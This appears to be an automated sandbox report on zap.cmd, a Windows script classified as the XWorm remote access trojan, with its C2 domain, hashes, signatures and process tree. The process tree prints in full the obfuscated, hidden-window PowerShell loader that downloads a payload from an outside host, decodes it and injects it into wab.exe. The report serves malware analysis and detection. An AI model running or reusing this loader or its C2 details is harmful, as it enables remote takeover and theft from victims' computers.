Overview

overview

10

Static

static

1

zap.cmd

windows7-x64

10

zap.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 16:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    zap.cmd

  • Size

    6KB

  • MD5

    5521519d477ec8b95c87ad7ffc115145

  • SHA1

    551da12ea131d7bf60646a35cfcd8a3a16905f94

  • SHA256

    3a399d16db8e57cf727a03f4d9ad33624c08571c0f0b2e4120095e4622c22e19

  • SHA512

    46afb8d1b705d1d380b739898a74be66593b04adb9d27f3cacfdfe16c896ee08579e5c1aea410fbdb4c5116987f99e0ed9396b35f6761dbab48eeef1d425f96f

  • SSDEEP

    96:JQyAIf/tbpCJ5gEpH6SpLiF2gzfTUOTgdGw9kVFVZM2jX3lQFgUXJYIpwsz:9ntb0S2uIOeD9kVFVZM2r8BX+M

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

tbsagyw.duckdns.org:8896

Mutex

MFUu6tulv9qAMMHj

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\zap.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico Aggri B ofdUnd.r.Go wiDTv.faoTriplwSk.tenBas slDot.noUnrubaPhysidAn,roFSuperi.alacl oreaeTande(Offer$AttraL Stito Rep.dP.rnod.xhaleBajonnFjerndNonreeStrans Swea,Hyper$Gi,lyBThermrSofa a VelknBesprdAfgift pu.raUnatulMoraletorp.rBaga.nForvieTanke)Blsop ';$Brandtalerne=$Boglrdes[0];Smrkers (hdrede ' Nati$Namarg ,dkllG,ainoKontrbUndera.kidel.seud:cauldWModele unids EmbrlCoa,jeEnodayCivicij,llasOvnlamRewei9N.rma0Buffi=Overt( t afTMagtbeE,linsEf,ustIndsm-HushoPsamplaPhthatConvihAutoc Kinne$ContrBStenorNonseaBlkklnOxhordUngautCivila CoralrenteeGlimrrWal mnVeugleInsim)Cyc o ');while (!$Wesleyism90) {Smrkers (hdrede 'Legum$Mandag DivelFraadopro.abConsua Jagtl Torf:Tug eAUddykuSu ulmSlowfaSpy.kgMutuaaGl,tt=Sp.se$SolistFugtfr ndsiuSoviee pun ') ;Smrkers $Emplanes;Smrkers (hdrede 'neuroS,ugtutGoldsa.ylesrRaf,itErsta- Vat,SU,envlTr,moeNringeSakulpM chi Efflo4For,r ');Smrkers (hdrede 'Behag$ jemvg,rammlTrompo RulabGavlhahage,lSamsp:G.addW And egablesRotunl Paroe Ta,syCentriSerboscercimF.rbu9Aboli0 har=f rme( DiscTTo pleSagfrsDob,etFlerv-Rund.PSammeaSkylltYndigh Bn s svovl$Ttn nBSax fr,reinaDeo ynBajadd Benjt.rochaStubblPretreUnconr ,hennIre eeTintn)Infes ') ;Smrkers (hdrede 'Panno$huen,g Va,dl adreo Kr sbAmbosa StrilStryg:Tro aNEkstraRododb S raoStarti KoranAlabatSighteKursurOarl.vGunvoaRebapl Em,slMontreAnorct OmsvsU sty=Aaleg$Re.tigGuidolOrienoPolstbUndosaTi kllLejli:KorntPDeambrComp t SubheooblanMinictMiddliYunkesLagertOdyss+Da,ha+Hj.es% Wood$ZulhiS.nempoBarbemTserbmFelaheWel,er,ashhfGhaneu.ipargHerenlOpnaaeSalgsmFuldmoFettsdSvigteErgo.lTereslPerfue DiserGoorosNepa..Toccac Forno S mtuEkspon BagltTermo ') ;$Loddendes=$Sommerfuglemodellers[$Nabointervallets];}$Programpakke=340015;$Leath=26897;Smrkers (hdrede ',kris$HypergCoopelKnaldoUmorabGtersaKvintlF.ail:Sdes CNringoForb.nScir fIncurlSixmoa .isctBenedeHanga Destr= Indo ScrumGTe.hne AlqutTae i-LkkerC AnveoAeolon CholtC ocaeUltran.rstetPeace Raptu$varieBU prer AppeaByvaan LngddKn trtSkue.aGramml B.lteU.derrSpacin Bofoe Brak ');Smrkers (hdrede 'Raket$.oknigRebral TabeoCephab.oophaUdboml Bass:PraetAForrelDoku bGenreiTeamen SvovoAcc,lePox.nn Capa Acron=Overs Ge,ni[DokumS.nwaly steosDybdetForskeImponmSmede.R sciC HippoKorrentringvAfnazeimperrShohetRampo]Idiom:Super:L,phiFGill.r Sunso Tranm BidrB.leipaAtom,sUnpure Vika6 est4ElectS Pip.tTroldrM,croi WadmnP tgigPand.(Pter,$ TracC Ko.goSped.nPilhefSemiflRin,ea BrantJordve.aane)Dodec ');Smrkers (hdrede ' Unla$SpheggH ngal SpiloTylotbFor,aa FlytlD rth:Unna,AFordomUnsapp KenyuIdolit SoejeVar.ledogm sLokal .icqu=Deorb Trime[BarkaSbenv.yOverdsMonomtDissee ummmSagsk.UfrihT A.fdeS lidxArcadtjeapo.SalthEGl.ednSiv rcForgeoUmbosdBronciWate,n De.og,idym]Kunde:Dis,e:MoeriASangdSBurlaCReachI limI,ohor.DentiGUnmapeObliqtM.edsS EleptEndosrS.guaiDiakon Undegvitro(Unp,r$ProduAnonanl Drbeb ,horiE tern WankoInt,reUnsysnFo be)Etats ');Smrkers (hdrede 'Frank$NorthgNobl lUdlaao,agplbStudea serolTuber: BiofAFilipl KissvNonnaa Lo an Mikk= Nat $Sej tA asermOvercpMonjauEquiltSi hoeBastaeStnkesChapp.UnremsMicr uChirobC.rvisMa ultUdsgnrHeinriInconnIgl egVene.(Handw$BlitzPQuipsrHjemmo sa vgHab.trHalola RechmPelsdpInsalaUnc lkAbdickSuseneLowwo, Angr$ UninLTilvre E traneglitResishRedni)C.ssa ');Smrkers $Alvan;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
        3⤵
          PID:2728
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico Aggri B ofdUnd.r.Go wiDTv.faoTriplwSk.tenBas slDot.noUnrubaPhysidAn,roFSuperi.alacl oreaeTande(Offer$AttraL Stito Rep.dP.rnod.xhaleBajonnFjerndNonreeStrans Swea,Hyper$Gi,lyBThermrSofa a VelknBesprdAfgift pu.raUnatulMoraletorp.rBaga.nForvieTanke)Blsop ';$Brandtalerne=$Boglrdes[0];Smrkers (hdrede ' Nati$Namarg ,dkllG,ainoKontrbUndera.kidel.seud:cauldWModele unids EmbrlCoa,jeEnodayCivicij,llasOvnlamRewei9N.rma0Buffi=Overt( t afTMagtbeE,linsEf,ustIndsm-HushoPsamplaPhthatConvihAutoc Kinne$ContrBStenorNonseaBlkklnOxhordUngautCivila CoralrenteeGlimrrWal mnVeugleInsim)Cyc o ');while (!$Wesleyism90) {Smrkers (hdrede 'Legum$Mandag DivelFraadopro.abConsua Jagtl Torf:Tug eAUddykuSu ulmSlowfaSpy.kgMutuaaGl,tt=Sp.se$SolistFugtfr ndsiuSoviee pun ') ;Smrkers $Emplanes;Smrkers (hdrede 'neuroS,ugtutGoldsa.ylesrRaf,itErsta- Vat,SU,envlTr,moeNringeSakulpM chi Efflo4For,r ');Smrkers (hdrede 'Behag$ jemvg,rammlTrompo RulabGavlhahage,lSamsp:G.addW And egablesRotunl Paroe Ta,syCentriSerboscercimF.rbu9Aboli0 har=f rme( DiscTTo pleSagfrsDob,etFlerv-Rund.PSammeaSkylltYndigh Bn s svovl$Ttn nBSax fr,reinaDeo ynBajadd Benjt.rochaStubblPretreUnconr ,hennIre eeTintn)Infes ') ;Smrkers (hdrede 'Panno$huen,g Va,dl adreo Kr sbAmbosa StrilStryg:Tro aNEkstraRododb S raoStarti KoranAlabatSighteKursurOarl.vGunvoaRebapl Em,slMontreAnorct OmsvsU sty=Aaleg$Re.tigGuidolOrienoPolstbUndosaTi kllLejli:KorntPDeambrComp t SubheooblanMinictMiddliYunkesLagertOdyss+Da,ha+Hj.es% Wood$ZulhiS.nempoBarbemTserbmFelaheWel,er,ashhfGhaneu.ipargHerenlOpnaaeSalgsmFuldmoFettsdSvigteErgo.lTereslPerfue DiserGoorosNepa..Toccac Forno S mtuEkspon BagltTermo ') ;$Loddendes=$Sommerfuglemodellers[$Nabointervallets];}$Programpakke=340015;$Leath=26897;Smrkers (hdrede ',kris$HypergCoopelKnaldoUmorabGtersaKvintlF.ail:Sdes CNringoForb.nScir fIncurlSixmoa .isctBenedeHanga Destr= Indo ScrumGTe.hne AlqutTae i-LkkerC AnveoAeolon CholtC ocaeUltran.rstetPeace Raptu$varieBU prer AppeaByvaan LngddKn trtSkue.aGramml B.lteU.derrSpacin Bofoe Brak ');Smrkers (hdrede 'Raket$.oknigRebral TabeoCephab.oophaUdboml Bass:PraetAForrelDoku bGenreiTeamen SvovoAcc,lePox.nn Capa Acron=Overs Ge,ni[DokumS.nwaly steosDybdetForskeImponmSmede.R sciC HippoKorrentringvAfnazeimperrShohetRampo]Idiom:Super:L,phiFGill.r Sunso Tranm BidrB.leipaAtom,sUnpure Vika6 est4ElectS Pip.tTroldrM,croi WadmnP tgigPand.(Pter,$ TracC Ko.goSped.nPilhefSemiflRin,ea BrantJordve.aane)Dodec ');Smrkers (hdrede ' Unla$SpheggH ngal SpiloTylotbFor,aa FlytlD rth:Unna,AFordomUnsapp KenyuIdolit SoejeVar.ledogm sLokal .icqu=Deorb Trime[BarkaSbenv.yOverdsMonomtDissee ummmSagsk.UfrihT A.fdeS lidxArcadtjeapo.SalthEGl.ednSiv rcForgeoUmbosdBronciWate,n De.og,idym]Kunde:Dis,e:MoeriASangdSBurlaCReachI limI,ohor.DentiGUnmapeObliqtM.edsS EleptEndosrS.guaiDiakon Undegvitro(Unp,r$ProduAnonanl Drbeb ,horiE tern WankoInt,reUnsysnFo be)Etats ');Smrkers (hdrede 'Frank$NorthgNobl lUdlaao,agplbStudea serolTuber: BiofAFilipl KissvNonnaa Lo an Mikk= Nat $Sej tA asermOvercpMonjauEquiltSi hoeBastaeStnkesChapp.UnremsMicr uChirobC.rvisMa ultUdsgnrHeinriInconnIgl egVene.(Handw$BlitzPQuipsrHjemmo sa vgHab.trHalola RechmPelsdpInsalaUnc lkAbdickSuseneLowwo, Angr$ UninLTilvre E traneglitResishRedni)C.ssa ');Smrkers $Alvan;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2696
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
            4⤵
              PID:2824
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:808

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        99c962cdf7ee5ad5f91023336b2eac40

        SHA1

        01d23e3707f70462ab92863a8f585d8b796ac75e

        SHA256

        cfd56534a4521602c237beb7125253b53a5457783de5a4ee74c03e329c1f2ab7

        SHA512

        2560b3b19cf17f99649deebd6a53736a615aeb3d8f3720e31904ec6cf7aa84c303605da5066f61c42fa667856b78d35bff5a45d1fd347ef89ba4968083c34e3e

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\Cab1B6F.tmp
        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\Tar1B81.tmp
        Filesize

        177KB

        MD5

        435a9ac180383f9fa094131b173a2f7b

        SHA1

        76944ea657a9db94f9a4bef38f88c46ed4166983

        SHA256

        67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

        SHA512

        1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Innumerable.Sno
        Filesize

        477KB

        MD5

        e6ecb4577c73a32dc43d8d01cc10cadb

        SHA1

        86d431761162d03713d45bfff6accd0d23411775

        SHA256

        c003ac50da0efa115bfeaaea28f7bef37df720aad045c1fe8bd8ede0e3de7554

        SHA512

        9b8ed24618e83b3b067fe1490f7f6f0fd50fe5f7973624300d463107150a6e2d1d6c2bc3b5d6535f563b3a5b29994e0c7eae5b49ded9f12a67341d593836da07

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E4FN5QTSCQWLF5GM6B3X.temp
        Filesize

        7KB

        MD5

        b02e96229191a0e7ad402943f49dd19e

        SHA1

        d6243929007cf8c3fed6cd68879dcb11e373c0ea

        SHA256

        59eafa0786f422d2a63eec35ee94b6fe7e2507606c0533c9b5c32d5be4bfc019

        SHA512

        872a1054810bdf1188a787a08db2a507a68970f41b35997bfa936b77d94cbb01f527901554bc5b2308cddf48b851453831c576b9a68893e33ae05eb75fe6e053

        Download Submit
      • memory/808-86-0x0000000000EB0000-0x0000000000EC0000-memory.dmp
        Filesize

        64KB

        Download
      • memory/808-84-0x0000000000EB0000-0x0000000001F12000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/1440-6-0x0000000001C80000-0x0000000001C88000-memory.dmp
        Filesize

        32KB

        Download
      • memory/1440-11-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1440-9-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1440-10-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1440-4-0x000007FEF549E000-0x000007FEF549F000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1440-56-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1440-57-0x000007FEF549E000-0x000007FEF549F000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1440-8-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1440-7-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1440-85-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1440-5-0x000000001B770000-0x000000001BA52000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/2696-55-0x00000000065E0000-0x0000000009F8C000-memory.dmp
        Filesize

        57.7MB

        Download